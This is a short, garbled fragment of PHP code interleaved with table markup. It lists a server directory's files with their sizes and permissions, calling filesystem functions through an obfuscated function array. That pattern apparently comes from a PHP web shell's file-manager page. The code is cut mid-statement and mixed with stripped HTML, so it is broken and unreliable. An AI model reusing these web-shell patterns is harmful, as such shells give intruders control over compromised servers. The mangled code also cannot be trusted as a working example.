Name | Size | Permission | Action | {$d} | N/A | ".perms("$p/$d")." | "; } foreach ($scD as $f) { if (!$func[7]("$p/$f")) continue; $size = $func[10]("$p/$f")/1024; $size = round($size, 3); $size = ($size > 1024) ? round($size/1024, 2)."MB" : $size."KB"; echo " |
---|---|---|---|
{$f} | {$size} | ".perms("$p/$f")." |